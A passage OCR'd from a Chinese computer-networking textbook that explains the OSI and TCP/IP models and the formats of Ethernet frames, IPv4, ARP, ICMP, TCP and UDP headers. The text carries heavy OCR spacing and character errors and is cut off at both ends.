于 世界 上 任何 地 方 的 ,也 遵循 OSI 标准 的 其 他 任何 系统 进行 连接 。 这 个 分 委员 会 提出 了 开 
放 系 统 互联 参考 模型 , 即 OSI 参考 模型 (OSIVRM) , 它 定义 了 异类 系统 互联 的 标准 框架 。 
OSI/RM 模型 分 为 7 层 , 从 下 往 上 分 别 是 物理 层 、 数 据 链 路 层 、 网 络 层 、 传 输 层 、 会 话 层 .表示 
层 和 应 用 层 , 如 图 3-1 所 示 。 



































2 i 应 用 层 协议 
6 表示 层 
5 会 话 层 
4 传输 层 
3 网 络 层 
2 | 数据 链 路 层 
1 物理 层 
0 物理 万 边 媒 体 





图 3-1 OSI/RM 模型 


计算 机 网 络 体系 结构 是 计算 机 网 络 层次 模型 和 各 层 协 议 的 集合 。 计 算 机 网 络 体系 结构 
是 抽象 的 ,而 实现 是 具体 的 ,是 能 够 运行 的 一 些 硬件 和 软件 ,多 采用 层次 结构 。 划 分 层次 的 
原则 如 下 。 

(1) 网 中 各 节点 都 有 相同 的 层次 。 

(2) 不 同 节点 的 同等 层 具有 相同 的 功能 。 

(3) 同一 节点 内 相 邻 层 之 间 通 过 接口 通信 。 

(4) 每 一 层 使 用 下 层 提供 的 服务 ,并 向 其 上 层 提供 服务 。 

(5) 不 同 节点 的 同等 层 按照 协议 实现 对 等 层 之 间 的 通信 。 
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下 面 介绍 各 层 的 主要 功能 。 

(1) 物理 层 。 这 是 整个 OSI 参考 模型 的 最 底层 , 它 的 任务 就 是 提供 网 络 的 物理 连接 。 
所 以 ,物理 层 是 建立 在 物理 介质 上 的 (而 不 是 多 辑 上 的 协议 和 会 话 ) , 它 提供 的 是 机 械 和 电气 
接口 ,其 作用 是 使 原始 的 数据 比特 (bit) 流 能 在 物理 媒体 上 传输 。 

(2) 数据 链 路 层 。 数 据 链 路 层 分 为 介质 访问 控制 (MAC)? 子 层 和 逻辑 链 路 控制 (LLC) 
子 层 , 在 物理 层 提 供 比特 流传 输 服务 的 基础 上 ,传送 以 帧 为 单位 的 数据 。 数 据 链 路 层 的 主要 
作用 是 通过 校 验 、 确 认 和 反馈 重 发 等 手段 ,将 不 可 靠 的 物理 链 路 改造 成 对 网 络 层 来 说 无 差错 
的 数据 链 路 。 数 据 链 路 层 还 要 协调 收发 双方 的 数据 传输 速率 , 即 进行 流量 控制 ,以 防止 接收 
方 因 来 不 及 处 理发 送 方 来 的 高 速 数据 而 导致 缓冲 区 溢出 及 线路 阻塞 等 问题 。 

(3) 网 络 层 。 网 络 层 负 责 由 一 个 站 到 另 一 个 站 间 的 路 径 选 择 , 它 解决 的 是 网 络 与 网 络 
之 间 , 即 网 际 的 通信 问题 ,而 不 是 同一 网 段 内 部 的 事 。 网 络 层 的 主要 功能 是 提供 路 由 , 即 选 
择 到 达 目 的 主机 的 最 佳 路 径 , 并 沿 该 路 径 传送 数据 包 ( 分 组 )。 此 外 ,网 络 层 还 具有 流量 控制 
和 拥塞 控制 的 能 力 。 

(4) 传输 层 。 传 输 层 负责 提供 两 站 之 间 数 据 的 传送 。 当 两 个 站 已 确定 建立 了 联系 后 ， 
传输 层 即 负责 监督 ,以 确保 数据 能 正确 无 误 的 传送 ,提供 可 靠 的 端 到 端 数据 传输 。 

(5) 会 话 层 。 会 话 层 主要 负责 控制 每 一 站 究竟 什么 时 间 可 以 传送 与 接收 数据 。 例 如 ， 
如 果 有 许多 使 用 者 同时 进行 传送 与 接收 消息 ,此 时 会 话 层 的 任务 就 要 去 决定 是 要 接收 消息 
或 是 传送 消息 , 才 不 会 有 “碰撞 ”的 情况 发 生 。 

(6) 表示 层 。 表 示 层 负责 将 数据 转换 成 使 用 者 可 以 看 得 懂 的 有 意义 的 内 容 , 包 括 格式 
转换 ,数据 加 密 与 解密 ,数据 压缩 与 恢复 等 功能 。 

(7) 应 用 层 。 应 用 层 负 责 网 络 中 应 用 程序 与 网 络 操作 系统 间 的 联系 ,包括 建立 与 结束 
使 用 者 之 间 的 联系 ,监督 并 管理 相互 连接 起 来 的 应 用 系统 以 及 系统 所 用 的 各 种 资源 。 

数据 在 网 络 中 传送 时 ,在 发 送 方 和 接收 方 有 一 个 数据 封装 和 解 封装 的 过 程 ,如 图 3-2 所 示 。 




















































































































| 计算 机 A | 计算 机 B 
上 1 1 
上 | 1 |] 
| 一 | 应 用 进程 M -+ ----------- 二 数据 | -一 -上 应 用 进程 N 上 -一 
| | | | 
| 应 用 层 应 用 层 | 
| | | 表示 屋 表层 | | | 
会 话 层 | 因数 所 间 元 | 请 | | | 
| | | 传输 层 一 报 文 ----l 一 | 传输 屋 1 |! 
| | 网络 层 -| 分 组 一 -| 一 网 络 层 | 
| 数据 链 路 层 让 | 帧 pi 数据 链 路 层 | 
| 物理 层 时 下 比特 序列 -+ | 
上 1 





























传输 媒介 
3-2 数据 的 封装 和 解 封装 
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(1) 当 计算 机 A 的 应 用 进程 M 的 数据 传送 到 应 用 层 时 ,应 用 层 为 数据 加 上 本 层 控制 报 
头 后 ,组 成 应 用 层 的 服务 数据 单元 ,然后 再 传输 给 表示 层 。 

(2) 表示 层 接 收 到 这 个 数据 单元 后 ,加 上 本 层 的 控制 报头 ,组 成 表示 层 的 服务 数据 单 
元 ,再 传送 给 会 话 层 , 以 此 类 推 ,数据 被 传送 到 传输 层 。 

(3) 传输 层 接 收 到 这 个 数据 单元 后 ,加 上 本 层 的 控制 报头 ,就 构成 了 传输 层 的 服务 数据 
单元 , 它 被 称 为 报 文 (message)。 

(4) 传输 层 的 报 文 传送 到 网 络 层 时 ,由 于 网 络 层 数 据 单元 的 长 度 限制 ,传输 层 长 报 文 将 
被 分 成 多 个 较 短 的 数据 段 (分 片 ), 加 上 网 络 层 的 控制 报头 ,就 构成 了 网 络 层 的 服务 数据 单 
元 , 它 被 称 为 分 组 (packet)。 

(5) 网 络 层 的 分 组 传送 到 数据 链 路 层 时 ,加 上 数据 链 路 层 的 控制 信息 ( 帧 头 和 帧 尾 ) ,就 
构成 了 数据 链 路 层 的 服务 数据 单元 , 它 被 称 为 帧 (frame) 。 

(6) 数据 链 路 层 的 帧 传送 到 物理 层 后 ,物理 层 将 以 比特 (bit) 流 的 方式 通过 传输 媒介 传 
输出 去 。 当 比特 流 到 达 目 的 节点 计算 机 B 时 ,再 从 物理 层 依 层 上 传 ,每 层 对 各 层 的 控制 报 
头 进行 处 理 后 ,将 用 户 数据 上 交 给 上 一 层 , 最 终 将 计算 机 A 的 进程 M 的 数据 传送 给 计算 机 
B 的 进程 N。 

尽管 应 用 进程 M 的 数据 在 OSI 环境 中 经 过 复杂 的 处 理 过 程 才能 送 到 另 一 台 计 算 机 的 
应 用 进程 N, 但 对 于 每 台 计 算 机 的 应 用 进程 而 言 ,OSI 环境 中 数据 流 的 复杂 处 理 过 程 是 透明 
的 。 应 用 进程 M 的 数据 好 像 是 “直接 ”传送 给 应 用 进程 N, 这 就 是 开放 系统 在 网 络 通信 过 程 
中 最 本 质 的 作用 。 

2. TCP/IP 参考 模型 

建立 OSI 体系 结构 的 初衷 是 希望 为 网 络 通信 提供 一 种 统一 的 国际 标准 ,然而 其 固有 的 
复杂 性 等 缺点 制约 了 它 的 实际 应 用 。 一 般 而 言 ,由 于 OSI 体系 结构 具有 概念 清晰 的 优点 ， 
主要 适用 于 教学 研究 。 

ARPAnet 最 初 开发 的 网 络 协议 使 用 在 通信 可 靠 性 较 差 的 通信 子 网 中 , 且 出 现 了 不 少 问 
题 , 这 就 导致 了 新 的 网 络 协议 TCP/IP 的 产生 。 虽 然 TCP/IP 协议 不 是 OSI 标准 ,但 它 是 目 
前 最 流行 的 商业 化 的 网 络 协议 ,并 被 公认 为 是 当前 的 工业 标准 或 “事实 上 的 标准 ”。 

TCP/IP 协议 具有 以 下 特点 。 

(1) 开放 的 协议 标准 ,独立 于 特定 的 计算 机 硬件 和 操作 系统 。 

(2) 独立 于 特定 的 网 络 硬件 ,可 以 运行 在 局 域 网 广域网 中 ,更 适用 于 互联 网 。 

(3) 统一 的 地 址 分 配方 案 , 使 得 整个 TCP/IP 设备 在 网 中 都 具有 唯一 的 地 址 。 

(4) 标准 化 的 高 层 协议 ,可 提供 多 种 可 靠 的 服务 。 

TCP/IP 参考 模型 分 为 4 层 : 网 络 接 口 层 、 网 络 层 (互联 层 ) ,传输 层 和 应 用 层 。TCP/IP 
参考 模型 与 OSI 参考 模型 的 对 应 关系 如 表 3-1 所 示 。 

TCP/IP 的 网 络 接 口 层 实现 了 OSI 模型 中 物理 层 和 数据 链 路 层 的 功能 。 

TCP/IP 的 网 络 层 功 能 主要 体现 在 以 下 三 个 方面 : 

(1) 处 理 来 自传 输 层 的 分 组 发 送 请 求 ; 

(2) 处 理 接 收 的 分 组 ; 
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表 3-1 TCP/IP 参考 模型 与 OSI 参考 模型 的 对 应 关系 

















OSI 参考 模 型 TCP/IP 参考 模型 TCP/IP 常用 协议 
应 用 层 
表示 层 应 用 层 DNS\HTTP、SMTP、POP、Telnet\FTPNFS 
会 话 层 
传输 层 传输 层 TCP.UDP 
网 络 层 网 络 层 IPICMP IGMP、ARP、RARP 
数据 链 路 层 
网 络 接口 层 Ethernet\ATM、FDDIJISDN TDMA 
物理 层 











(3) 处 理 路 径 选 择 .流量 控制 与 拥塞 问题 。 

传输 层 实 现 应 用 进程 间 的 端 到 端 通信 ,主要 包括 两 个 协议 : TCP 协议 和 UDP 协议。 

TCP 协议 是 一 种 可 靠 的 面向 连接 的 协议 ,允许 将 一 台 主 机 的 字 节 流 无 差错 地 传送 到 目 
的 主机 。UDP 协议 是 不 可 靠 的 无 连接 协议 ,不 要 求 分 组 顺序 到 达 目 的 地 。 

应 用 层 的 主要 协议 有 : 域名 系统 (DNS) 、 超 文本 传输 协议 (HTTP)、 简 单 邮件 传输 协议 
(SMTP) 、 邮 局 协议 (POP) .远程 登录 协议 (TELNET) .文件 传输 协议 (FTP) 、 网 络 文件 系统 
(NFS) 等 。 


3.3.2 以 太 网 的 帧 格式 


1. MAC 地 址 

为 了 标识 以 太 网 上 的 每 台 主机 ,需要 给 每 台 主 机 上 的 网 络 适配器 (网 卡 ) 分 配 一 个 全 球 
唯一 的 通信 地 址 , 即 MAC 地 址 ,或 称 为 网 卡 的 物理 地 址 、Ethernet 地 址 。 

IEEE 负责 为 网 络 适配器 制造 厂商 分 配 MAC 地 址 块 , 各 厂商 为 自己 生产 的 每 块 网 络 适 
配器 分 配 一 个 全 球 唯一 的 MAC 地 址 。MAC 地 址 长 度 为 48 比特 , 共 6 字 节 ,如 00-0D-88- 
47-58-2C( 十 六 进 制 ) ,其 中 ,前 3 字 节 为 IEEE 分 配给 厂商 的 厂商 代码 (00-0D-88) ,后 3 字 节 
为 厂商 自己 设置 的 网 络 适配器 编号 (47-58-2C) 。MAC 广播 地 址 为 FF-FF-FF-FF-FF-FF。 
如 果 MAC 地 址 (二 进 制 ) 的 第 8 位 是 1, 则 表示 该 MAC 地 址 是 组 播 地 址 ,如 01-00-5E-37- 
55-4D。 

2. 以 太 网 的 帧 格式 

以 太 网 的 帧 是 数据 链 路 层 的 封装 形式 ,网 络 层 的 数据 包 被 加 上 帧 头 和 帧 尾 成 为 可 以 被 
数据 链 路 层 识别 的 数据 帧 (成 帧 ) 。 虽 然 帧 头 和 帧 尾 所 用 的 字 节 数 是 固定 不 变 的 ,但 依 被 封 
装 的 数据 包 大 小 的 不 同 ,以 太 网 的 帧 长 度 也 在 变化 ,其 范围 是 64 一 1518 字 节 (不 算 8 字 节 的 
前 导 字 ) 。 

以 太 网 的 帧 格式 有 多 种 ,在 每 种 格式 的 帧 开始 处 都 有 64 比特 (8 字 节 ) 的 前 导 字 符 , 其 
中 前 7 字 节 为 前 同步 码 (7 个 10101010) ,第 8 字 节 为 帧 起 始 标志 (10101011)。 图 3-3 所 示 
为 Ethernet 开 的 帧 格式 (未 包括 前 导 字 符 ) 。 

Ethernet ][ 类 型 以 太 网 帧 的 最 小 长 度 为 64 字 节 (6 十 6 十 2 十 46 十 4) ,最 大 长 度 为 1518 字 节 
(6 十 6 十 2 十 1500 十 4)。 其 中 前 12 字 节 分 别 标识 出 发 送 数据 帧 的 源 节点 MAC 地 址 和 接收 
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目的 MAC 地 址 源 MAC 地 址 类 型 数据 FCS 
(6 字 节 ) (6 字 节 ) (2 字 节 ) (46~1500 字 节 ) (4 字 节 ) 























图 3-3 ”Ethernet 开 的 帧 格式 


数据 帧 的 目标 节点 MAC 地 址 。 接 下 来 的 2 字 节 标识 出 以 太 网 帧 所 携带 的 上 层 数据 类 型 ， 
如 十 六 进 制 数 0x0800 代表 IP 协议 数据 ,如 十 六 进 制 数 0x0806 代表 ARP 协议 数据 等 。 在 
不 定 长 的 数据 字段 后 是 4 字 节 的 帧 校 验 序 列 (frame check sequence,FCS) ,采用 32 位 CRC 
循环 元 余 校 验 ,对 从 * 目 的 MAC 地 址 ”字段 到 “数据 ”字段 的 数据 进行 校 验 。 


3.3.3 网络 层 协 议 格式 


网 络 层 的 协议 主要 有 IP 协议 .ARP 协议 和 ICMP 协议 。 

1. IP 协议 格式 

IP 协议 格式 分 为 两 大 部 分 : 报头 和 数据 区 ,其 中 报头 仅仅 是 正确 传输 高 层 ( 即 传输 层 ) 
数据 而 增加 的 控制 信息 ,数据 区 包括 高 层 需要 传输 的 数据 。 

IPv4 协议 格式 如 图 3-4 所 示 。 




































































比特 0 1 2 3 4 5 6 7 
优 和 级 |D|T|r]c 未 用 
EE 2 + 16 19 24 31 
版 本 | 报头 长 度 | 服务 类 型 总 长 度 
固定 部 分 二 标志 片 仿 移 
首部 4 20 字 区 生存 时 间 协议 类型 人 
源 IP 地 址 
目的 IP 地 址 
可 变 部 分 可 选 字段 (长 度 可 变 ) 项 充 
数据 部 分 
传送 4 二 一 首部 人 
IPv4 数 据 报 
图 3-4 ”IPv4 协议 格式 
各 字段 的 含义 如 下 。 


(1) 版 本 。 占 4 位 , 指 IP 协议 版 本 号 (一 般 是 4, 即 IPv4) ,不 同 IP 版 本 规定 的 数据 格式 
不 同 。 

(2) 报头 长 度 。 占 4 位 ,指数 据 报 报头 的 长 度 。 以 32 位 (4 字 节 ) 为 单位 , 当 报 头 中 无 可 
选项 时 ,报头 的 基本 长 度 为 5(20 字 节 )。 

(3) 服务 类 型 。 占 8 位 ,包括 一 个 3 位 长 度 的 优先 级 ,4 个 标志 位 D( 延 迟 )、T( 春 吐 
量 )、R( 可 靠 性 ) 和 C( 代 价 ), 另 外 一 位 未 用 。 

(4) 总 长 度 。 占 16 位 ,数据 报 的 总 长 度 , 包 括 头 部 和 数据 ,以 字 节 为 单位 。 
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(5) 标识 。 占 16 位 , 源 主 机 赋予 IP 数据 报 的 标识 符 , 目 的 主机 利用 此 标识 判断 此 分 片 
属于 哪个 数据 报 ,以便 重组 。 

当 了 P 分 组 在 网 上 传输 时 ,可 能 要 跨越 多 个 网 络 , 但 每 个 网 络 都 规定 了 一 个 帧 最 多 携带 
的 数据 量 ( 此 限制 称 为 最 大 传输 单元 MTU) , 当 长 度 超过 MTU 时 ,就 需要 将 数据 分 成 若干 
个 较 小 的 部 分 (分 片 ) ,然后 独立 发 送 。 目 的 主机 收 到 分 片 后 的 数据 包 后 ,对 分 片 再 重新 组 装 
(重组 ) 。 

(6) 标志 。 占 3 位 ,告诉 目的 主机 该 数据 报 是 否 已 经 分 片 ,是 否 是 最 后 的 分 片 。 

(7) 片 偏 移 。 占 13 位 ,本 片 数据 在 初始 IP 数据 报 中 的 位 置 ,以 8 字 节 为 单位 。 

(8) 生存 时 间 (CTTL)。 占 8 位 ,设计 一 个 计数 器 , 当 计数 器 值 为 0 时 ,数据 报 被 删除 , 避 
免 循 环 发 送 。 

(9) 协议 类 型 。 占 8 位 ,指示 数据 报 携带 的 数据 是 使 用 何 种 协议 ,以 便 使 目的 主机 的 人 P 
层 知道 应 将 数据 部 分 上 交 给 哪个 处 理 过 程 ,如 TCP(06)、UDP(17) ICMP(01) 等 。 

(10) 首部 校 验 和 。 占 16 位 ,只 校 验 数据 报 的 报头 ,不 包括 数据 部 分 。 

(11) IP 地 址 。 各 占 32 位 的 源 IP 地 址 和 目的 IP 地 址 分 别 表示 数据 报 发 送 者 和 接收 者 
的 IP 地 址 ,在 整个 数据 报 传输 过 程 中 ,此 两 字段 的 值 一 直 保持 不 变 。 

(12) 可 选 字段 (选项 ) 。 主 要 用 于 控制 和 测试 两 大 目的 。 既 然 是 选项 ,用 户 可 以 使 用 IP 
选项 ,也 可 以 不 使 用 选项 ,但 实现 IP 协议 的 设备 必须 能 处 理 IP 选项 。 在 使 用 选项 的 过 程 
中 ,如 果 造 成 IP 数据 报 的 报头 不 是 32 位 的 整数 倍 , 这 时 需要 使 用 "填充 字段 凑 齐 。 

IP 选项 主要 有 以 下 3 个 选项 。 

(1) 源 路 由 。 指 IP 数据 包 穿 越 互联 网 所 经 过 的 路 径 是 由 源 主机 指定 ,包括 严格 路 由 选 
项 和 松散 路 由 选项 。 严 格 路 由 选项 规定 IP 数据 包 要 经 过 路 径 上 的 每 一 个 路 由 器 , 相 邻 的 路 
由 器 之 间 不 能 有 中 间 路 由 器 ,并 且 经 过 的 路 由 器 的 顺序 不 能 改变 。 松 散 路 由 选项 给 出 数据 
包 必 须要 经 过 的 路 由 器 列表 ,并 且 要 求 按照 列表 中 的 顺序 前 进 , 但 是 ,在 前 进 途中 也 允许 经 
过 其 他 的 路 由 器 。 

(2) 记录 路 由 。 记 录 IP 数据 包 从 源 主机 到 目的 主机 所 经 过 的 路 径 上 各 个 路 由 器 的 IP 
地 址 ,用 于 测试 网 络 中 路 由 器 的 路 由 配置 是 否 正 确 。 

(3) 时 间 截 。 记 录 IP 数据 包 经 过 每 一 个 路 由 器 时 的 时 间 ( 以 ms 为 单位 ) 。 

2. ARP 协议 格式 

利用 ARP(address resolution protocol, 地 址 解析 协议 ) 就 可 以 由 IP 地 址 得 知 其 物理 地 
址 (MAC 地 址 )。 以 太 网 协议 规定 ,同一 局 域 网 中 的 一 台 主 机 要 和 另 一 台 主 机 进行 直接 
通信 ,必须 要 知道 目的 主机 的 MAC 地 址 。 而 在 TCP/IP 协议 中 ,网 络 层 和 传输 层 只 关心 
目的 主机 的 人 地 址 ,这 就 导致 在 以 太 网 中 使 用 IP 协议 时 ,数据 链 路 层 的 以 太 网 协议 接 到 
的 上 层 全 协议 提供 的 数据 中 ,只 包含 目的 主机 的 人 地址。 于 是 需要 一 种 方法 ,根据 目的 
主机 的 IP 地 址 获得 其 MAC 地 址 ,这 就 是 ARP 协议 要 做 的 事情 。 所 谓 地 址 解析 (address 
resolution) ,就 是 主机 在 发 送 数据 帧 前 将 目的 卫 地 址 解析 成 目的 主机 的 MAC 地 址 的 
过 程 。 

另外 , 当 发 送 主机 和 目的 主机 不 在 同一 个 局 域 网 中 时 ,即便 知道 目的 主机 的 MAC 地 
址 ,两 者 也 不 能 直接 通信 ,必须 经 过 路 由 转发 才 可 以 。 所 以 此 时 .发送 主机 通过 ARP 协议 
获得 的 将 不 是 目的 主机 的 真实 MAC 地 址 ,而 是 一 台 可 以 通 往 局 域 网 外 的 路 由 器 的 某 个 端 
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口 的 MAC 地址 。 于 是 ,此 后 发 送 主机 发 往 目 的 主机 的 所 有 帧 都 将 发 往 该 路 由 器 ,通过 它 向 
外 发 送 , 这 种 情况 称 为 ARP 代理 (ARP proxy)。 

1) ARP 的 工作 原理 

在 每 台 安装 有 TCP/IP 协议 的 计算 机 中 都 有 一 个 ARP 缓存 表 , 表 中 的 IP 地 址 与 MAC 
地 址 是 一 一 对 应 的 。 

下 面 以 主机 A(192. 168.1.5) 向 主机 B(192. 168. 1. 1) 发 送 数据 为 例 说 明 ARP 的 工作 
原理 。 

(1) 当 发 送 数据 时 ,主机 A 会 在 自己 的 ARP 缓存 表 中 寻找 是 否 有 目的 主机 IP 地 址 。 

(2) 如 果 找 到 了 ,也 就 知道 了 目的 MAC 地 址 ,直接 把 目的 MAC 地址 写 入 帧 里 面 ,就 可 
以 发 送 了 。 

(3) 如 果 在 ARP 缓存 表 中 没有 找到 目的 IP 地 址 ,主机 A 就 会 在 网 络 上 发 送 一 个 广播 : 
“我 是 192. 168. 1.5, 我 的 MAC 地 址 是 00-aa-00-66-d8-13, 请 问 IP 地 址 为 192. 168. 1.1 的 
MAC 地 址 是 什么 ?” 

(4) 网 络 上 其 他 主机 并 不 响应 ARP 询问 ,只 有 主机 B 接收 到 这 个 帧 时 , 才 向 主机 A 做 
出 这 样 的 回应 :“192. 168. 1.1 的 MAC 地 址 是 00-aa-00-62-c6-09”。 

(5) 这 样 ,主机 A 就 知道 了 主机 也 的 MAC 地址 , 它 就 可 以 向 主机 B 发 送信 息 了 。 

(6) 主机 A 和 B 还 同时 都 更 新 了 自己 的 ARP 缓存 表 ( 因 为 A 在 询问 的 时 候 把 自己 的 
IP 和 MAC 地址 一 起 告诉 了 B) ,下 次 主机 A 再 向 主机 BB 或 者 主机 B 向 主机 A 发 送信 息 时 ， 
直接 从 各 自 的 ARP 缓存 表 里 查 找 就 可 以 了 。 

(7) ARP 缓存 表 采 用 了 更 新 机 制 ( 即 设置 了 生存 时 间 TTL) ,在 一 段 时 间 内 (Windows 
系统 这 个 时 间 为 2min, 而 Cisco 路 由 器 的 这 个 时 间 为 5min) 如 果 表 中 的 某 一 行内 容 (IP 地 
址 与 MAC 地 址 的 映射 关系 ) 没 有 被 使 用 过 ,该 行内 容 就 会 被 删除 ,这 样 可 以 大 大 减少 ARP 
缓存 表 的 长 度 ,加快 查询 速度 。 

2) ARP 协议 格式 

ARP 协议 格式 如 图 3-5 所 示 。 


硬件 类 型 (2 字 节 ) 协议 类 型 2 字 节 ) 
| 硬件 地 址 长 度 (1 字 节 ) | ”协议 地 址 长 度 (1 字 节 ) | ”操作 类 型 (请求 “2 应答) 
| 发 送 站 硬件 地 址 (6 字 节 ) 
| 发 送 站 协议 地 址 (4 字 节 ) 
| 
| 




















目的 硬件 地 址 (6 字 节 ) 
目的 协议 地 址 (4 字 节 ) 


图 3-5 ARP 协议 格式 











各 字段 的 含义 如 下 。 

(1) 硬件 类 型 : 占 2 字 节 ,定义 ARP 实现 在 何 种 类 型 的 网 络 上 ,以 太 网 的 硬件 类 型 值 
为 0x0001。 

(2) 协议 类 型 : 占 2 字 节 ,定义 使 用 ARP 的 协议 类 型 .0x0800 表示 IPv4。 

(3) 硬件 地 址 长 度 : 占 1 字 节 ,以 字 节 为 单位 定义 硬件 地 址 的 长 度 , 以 太 网 为 6。 

(4) 协议 地 址 长 度 : 占 1 字 节 ,以 字 节 为 单位 定义 协议 地 址 的 长 度 ,IPv4 为 4。 
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(5) 操作 类 型 : 占 2 字 节 ,定义 报 文 类 型 ,1 为 ARP 请 求 ,2 为 ARP 应 答 ,3 为 RARP 
请 求 ,4 为 RARP 应 答 。 

(6) 发 送 站 硬件 地 址 : 发 送 站 的 MAC 地 址 , 占 6 字 节 。 

(7) 发 送 站 协议 地 址 : 发 送 站 的 IP 地 址 , 占 4 字 节 ,RARP 请 求 中 不 填 此 字段 。 

(8) 目的 硬件 地 址 : 接收 方 的 MAC 地 址 , 占 6 字 节 ,ARP 请 求 中 不 填 此 字段 ( 待 
解析 ) 。 

(9) 目的 协议 地 址 : 接收 方 的 IP 地 址 , 占 4 字 节 。 

ARP 数据 包 的 总 长 度 为 28 字 节 。 

3. ICMP 协议 格式 

在 任何 网 络 体系 结构 中 ,控制 功能 是 必 不 可 少 的 。 网 络 层 使 用 的 控制 协议 是 网 际 控制 


报 文 协议 (Internet control message protocol， 


























ICMP 报 文 
ICMP)。ICMP 不 仅 用 于 传输 控制 报 文 ,而 且 还 ! | 
用 于 传输 差错 报 文 。 | | 
实际 上 ,ICMP 报 文 是 作为 IP 数据 报 的 数据 - | 
IP 头 部 ICMP 报 文 
部 分 而 传输 的 ,如 图 3-6 所 示 。 
ICMP 协议 格式 如 图 3.7 所 示 。 图 3-6 ICMP 报 文 封装 在 IP 报 文中 传输 
当 ping 一 台 主机 想 看 它 是 否 运行 时 ,就 会 产 
生 一 条 ICMP 信息 ,目的 主机 将 用 它 自己 的 ICMP 信息 对 ping 请 求 做 出 回应 。 
0 7 15 31 
类 型 代码 校 验 和 

















(不 同类 型 和 代码 有 不 同 的 内 容 ) 
3-7 ICMP 协议 格式 





3.3.4 传输 层 协议 格式 


传输 层 的 协议 有 TCP 协议 和 UDP 协议 。 

TCP 提供 IP 环境 下 的 数据 可 靠 传输 , 它 提供 的 服务 包括 数据 流传 送 、 可 靠 性 ,流量 控 
制 、 全 双 工 操作 和 多 路 复 用 ,是 一 种 面向 连接 的 、 端 到 端的 .可 靠 的 数据 包 传送 协议 ,可 将 一 
台 主 机 的 字 节 流 无 差错 地 传送 到 目的 主机 。 通 俗 地 说 , 它 是 事先 为 所 发 送 的 数据 开辟 出 连 
接 好 的 通道 ,然后 再 进行 数据 发 送 。 而 UDP 则 不 为 IP 提供 可 靠 性 ` 流 量 控制 或 差错 恢复 功 
能 , 它 是 不 可 靠 的 无 连接 协议 ,不 要 求 分 组 顺序 到 达 目 的 地 。 一 般 来 说 ,TCP 对 应 的 是 可 靠 
性 要 求 高 的 应 用 ,而 UDP 对 应 的 则 是 可 靠 性 要 求 低 、 传 输 经 济 的 应 用 。TCP 协议 支持 的 应 
用 层 协议 主要 有 HTTP、FTP、Telnet、SMTP 等 ;UDP 支持 的 应 用 层 协议 主要 有 NFS、 
DNS、SNMP( 简 单 网 络 管理 协议 )、TFTP( 简 单 文 件 传输 协议 ) 等 。 

在 TCP/IP 体系 中 ,由 于 IP 是 无 连接 的 ,数据 要 经 过 若干 个 点 到 点 连接 ,不 知 会 在 什么 
地 方 存储 延迟 一 段 时 间 , 也 不 知 是 否 会 突然 冒 出 来 。TCP 协议 要 解决 的 关键 问题 就 在 于 
此 ,TCP 采 用 的 三 次 握手 机 制 、 滑 动 窗口 协议 ,确认 与 重 传 机 制 都 与 此 有 关 。 
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1. TCP 协议 格式 
TCP 协议 格式 如 图 3-8 所 示 。 
0 3 9 15 3 











































目的 端口 号 
| 也 到 
放电 字 
TCP | 确认 号 固定 
首部 | | 首部 长 度 | ”保留 标识 窗口 大 小 首部 


紧急 指针 











3-8 ”TCP 协议 格式 


各 字段 的 含义 如 下 。 

(1) 源 端口 号 和 目的 端口 号 : 各 占 16 位 ,标识 发 送 端 和 接收 端的 应 用 进程 。 这 两 个 值 
加 上 IP 首部 中 的 源 IP 地 址 和 目的 IP 地 址 ,唯一 地 确定 了 一 个 连接 。1024 以 下 的 端口 号 被 
称 为 公认 端口 (well-known port) ,它们 被 保留 下 来 用 于 一 些 标准 的 服务 。 

(2) 序号 : 占 32 位 。 所 发 送 的 消息 的 第 一 字 节 的 序号 ,用 以 标识 从 TCP 发 送 端 和 
TCP 接收 端 发 送 的 数据 字 节 流 。 

(3) 确认 号 : 占 32 位 ,为 期 望 收 到 对 方 的 下 一 个 消息 第 一 字 节 的 序号 。 它 也 是 为 确认 
的 一 端 所 期 望 接收 的 下 一 个 序号 。 只 有 在 “标识 ”字段 中 的 ACK 位 设置 为 1 时 ,此 确认 号 
才 有 效 。 

(4) 首部 长 度 : 占 4 位 ,是 以 32 位 为 计算 单位 的 TCP 报 文 段 首 部 的 长 度 。 

(5) 保留 : 占 6 位 ,为 将 来 的 应 用 而 保留 ,目前 置 为 0。 

(6) 标识 : 占 6 位 ,有 6 个 标识 位 (以 下 是 设置 为 1 时 的 意义 。 为 0 时 作用 相反 ) 。 

@ 紧急 位 (URG): 表示 紧急 指针 有 效 。 

@ 确认 位 (ACK): 表示 确认 号 有 效 。 

@ 急迫 位 (PSH) : 接收 方 收 到 数据 后 ,立即 送 往 应 用 程序 。 

@ 复位 位 (RST): 复位 由 于 主机 崩 省 或 其 他 原因 而 出 现 的 错误 连接 。 

@ 同步 位 (SYN):“SYN= 二 1,ACK==0” 表 示 连 接 请 求 的 消息 (第 一 次 握手 );“SYN=1， 
ACK= 二 1” 表示 同意 建立 连接 的 消息 (第 二 次 握手 );“SYN 一 0, ACK 王 1” 表示 收 到 同意 建立 
连接 的 消息 (第 三 次 握手 ) 。 

@ 终止 位 (FIN): 表示 数据 已 发 送 完毕 ,要 求 释放 连接 。 

(7) 窗口 大 小 : 占 16 位 , 指 滑动 窗口 大 小 。 

(8) 校 验 和 : 占 16 位 ,可 对 TCP 报 文 段 首部 和 TCP 数据 部 分 进行 校 验 。 

(9) 紧急 指针 : 占 16 位 ,是 当前 序号 到 紧急 数据 位 置 的 偏 移 量 。 

(10) 选项 : 用 于 提供 一 种 增加 额外 设置 的 方法 ,如 连接 建立 时 ,双方 需 说 明 最 大 的 负 
载 能 力 。 
(11) 填充 : 当 * 选 项 ”字段 长 度 不 足 32 位 时 ,需要 加 以 填充 。 
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(12) 数据 : 来 自 高 层 ( 即 应 用 层 ) 的 协议 数据 。 














2. UDP 协议 格式 
UDP 协议 格式 如 图 3-9 所 示 。 
0 Ls 31 
源 端口 号 目的 端口 号 
报 文 长 度 校 验 和 
数据 
3-9 UDP 协议 格式 
各 字段 的 含义 如 下 。 


(1) 源 端 口号 和 目的 端口 号 : 标识 发 送 端 和 接收 端的 应 用 进程 。 

(2) 报 文 长 度 : 包括 UDP 报头 和 数据 在 内 的 报 文 长 度 值 ,以 字 节 为 单位 ,最 小 为 8。 

(3) 校 验 和 : 计算 对 象 包括 伪 协 议 头 、UDP 报关 和 数据 。 校 验 和 为 可 选 字段 ,如 果 该 字 
段 设置 为 0, 则 表示 发 送 者 没有 为 该 UDP 报 文 提供 校 验 和 。 伪 协议 头 主要 包括 了 源 IP 地 
址 \ 目 的 IP 地 址 ,协议 类 型 等 来 自 IP 报头 的 字段 和 UDP 报 文 长 度 ,对 其 进行 校 验 主要 用 于 
